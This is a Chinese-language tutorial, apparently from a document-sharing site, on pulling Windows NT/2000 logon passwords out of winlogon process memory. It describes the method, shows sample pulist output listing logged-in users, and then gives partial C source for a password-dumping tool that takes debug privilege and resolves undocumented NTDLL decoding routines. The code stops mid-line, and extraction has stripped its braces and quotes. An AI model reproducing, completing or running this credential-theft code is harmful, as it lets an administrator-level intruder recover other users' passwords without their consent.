获取windows登陆账户密码


1、Windows Logon Process,即 Windows NT 的用户登录程序,负责管理用户的登录和退出。因为登录时的域名和用户名是以明文存储在 winlogon 进程中的,而 Password 是限定了查找本进程用户的密码,然后到 winlogon 进程的地址空间中查找 UserDomain 和 UserName,找到后再读取其后的加密口令。其实只要你自己指定用户名和 winlogon 进程去查找就可以了;只要你是管理员,任何在本机通过 msgina.dll 图形界面登录的用户口令都可以找到。步骤:1. 用 pulist 找到系统中已登录的域名和用户名,以及各 winlogon 进程的 id;2. 然后对每个 winlogon 进程

2、id 查找指定的用户就行了。example:C:\Documents and Settings\bingle>pulist Process PID User Idle 0 System 8 smss.exe 164 NT AUTHORITY\SYSTEM csrss.exe 192 NT AUTHORITY\SYSTEM winlogon.exe 188 NT AUTHORITY\SYSTEM wins.exe 1212 NT AUTHORITY\SYSTEM Explorer.exe 388 TEST-2KSERVER\Administrator internat.exe 1828 TEST-2KSERVE

3、R\Administrator conime.exe 1868 TEST-2KSERVER\Administrator msiexec.exe 1904 NT AUTHORITY\SYSTEM tlntsvr.exe 1048 NT AUTHORITY\SYSTEM taskmgr.exe 1752 TEST-2KSERVER\Administrator csrss.exe 2056 NT AUTHORITY\SYSTEM winlogon.exe 2416 NT AUTHORITY\SYSTEM rdpclip.exe 2448 TEST-2KSERVER\clovea Explorer.exe 2408

4、TEST-2KSERVER\clovea internat.exe 1480 TEST-2KSERVER\clovea cmd.exe 2508 TEST-2KSERVER\Administrator ntshell.exe 368 TEST-2KSERVER\Administrator ntshell.exe 1548 TEST-2KSERVER\Administrator ntshell.exe 1504 TEST-2KSERVER\Administrator csrss.exe 1088 NT AUTHORITY\SYSTEM winlogon.exe 1876 NT AUTHORITY\SYSTEM

5、rdpclip.exe 1680 TEST-2KSERVER\bingle Explorer.exe 2244 TEST-2KSERVER\bingle conime.exe 2288 TEST-2KSERVER\bingle internat.exe 1592 TEST-2KSERVER\bingle cmd.exe 1692 TEST-2KSERVER\bingle mdm.exe 2476 TEST-2KSERVER\bingle taskmgr.exe 752 TEST-2KSERVER\bingle pulist.exe 2532 TEST-2KSERVER\bingle 具体实现代码如下

6、#include #include #include #include typedef struct _UNICODE_STRING USHORT Length; USHORT MaximumLength; PWSTR Buffer; UNICODE_STRING, *PUNICODE_STRING; / Undocumented typedefs typedef struct _QUERY_SYSTEM_INFORMATION DWORD GrantedAccess; DWORD PID; WORD HandleType; WORD HandleId; DWORD Handle; QUERY

7、_SYSTEM_INFORMATION, *PQUERY_SYSTEM_INFORMATION; typedef struct _PROCESS_INFO_HEADER DWORD Count; DWORD Unk04; DWORD Unk08; PROCESS_INFO_HEADER, *PPROCESS_INFO_HEADER; typedef struct _PROCESS_INFO DWORD LoadAddress; DWORD Size; DWORD Unk08; DWORD Enumerator; DWORD Unk10; char Name 0x108; PROCESS_INF

8、O, *PPROCESS_INFO; typedef struct _ENCODED_PASSWORD_INFO DWORD HashByte; DWORD Unk04; DWORD Unk08; DWORD Unk0C; FILETIME LoggedOn; DWORD Unk18; DWORD Unk1C; DWORD Unk20; DWORD Unk24; DWORD Unk28; UNICODE_STRING EncodedPassword; ENCODED_PASSWORD_INFO, *PENCODED_PASSWORD_INFO; typedef DWORD (_stdcall

9、*PFNNTQUERYSYSTEMINFORMATION) (DWORD, PVOID, DWORD, PDWORD); typedef PVOID (_stdcall *PFNRTLCREATEQUERYDEBUGBUFFER) (DWORD, DWORD); typedef DWORD (_stdcall *PFNRTLQUERYPROCESSDEBUGINFORMATION) (DWORD, DWORD, PVOID); typedef void (_stdcall *PFNRTLDESTROYQUERYDEBUGBUFFER) (PVOID); typedef void (_stdca

10、ll *PFNTRTLRUNDECODEUNICODESTRING) (BYTE, PUNICODE_STRING); / Private Prototypes BOOL IsWinNT (void); BOOL IsWin2K (void); BOOL AddDebugPrivilege (void); DWORD FindWinLogon (void); BOOL LocatePasswordPageWinNT (DWORD, PDWORD); BOOL LocatePasswordPageWin2K (DWORD, PDWORD); void DisplayPasswordWinNT (

11、void); void DisplayPasswordWin2K (void); / Global Variables PFNNTQUERYSYSTEMINFORMATION pfnNtQuerySystemInformation; PFNRTLCREATEQUERYDEBUGBUFFER pfnRtlCreateQueryDebugBuffer; PFNRTLQUERYPROCESSDEBUGINFORMATION pfnRtlQueryProcessDebugInformation; PFNRTLDESTROYQUERYDEBUGBUFFER pfnRtlDestroyQueryDebug

12、Buffer; PFNTRTLRUNDECODEUNICODESTRING pfnRtlRunDecodeUnicodeString; DWORD PasswordLength = 0; PVOID RealPasswordP = NULL; PVOID PasswordP = NULL; DWORD HashByte = 0; wchar_t UserName 0x400; wchar_t UserDomain 0x400; int _cdecl main( int argc, char* argv ) printf( nt To Find Password in the Winlogon

13、processn ); printf( Usage: %s DomainName UserName PID-of-WinLogonnn, argv0 ); if (!IsWinNT () & (!IsWin2K () printf (Windows NT or Windows 2000 are required.n); return (0); / Add debug privilege to PasswordReminder - / this is needed for the search for Winlogon. / 增加 PasswordReminder 的权限 / 使得 PasswordReminder 可以打开并调试 Winlogon 进程 if (!AddDebugPrivilege () printf (Unable to add debug privilege.n); return (0); printf (The debug privilege has been added to PasswordReminder.n); / 获得几个未公开 API 的入口地址 HINSTANCE hNtDll = LoadLibrary (NTDLL.DLL); pfnNtQuerySystemInformation =
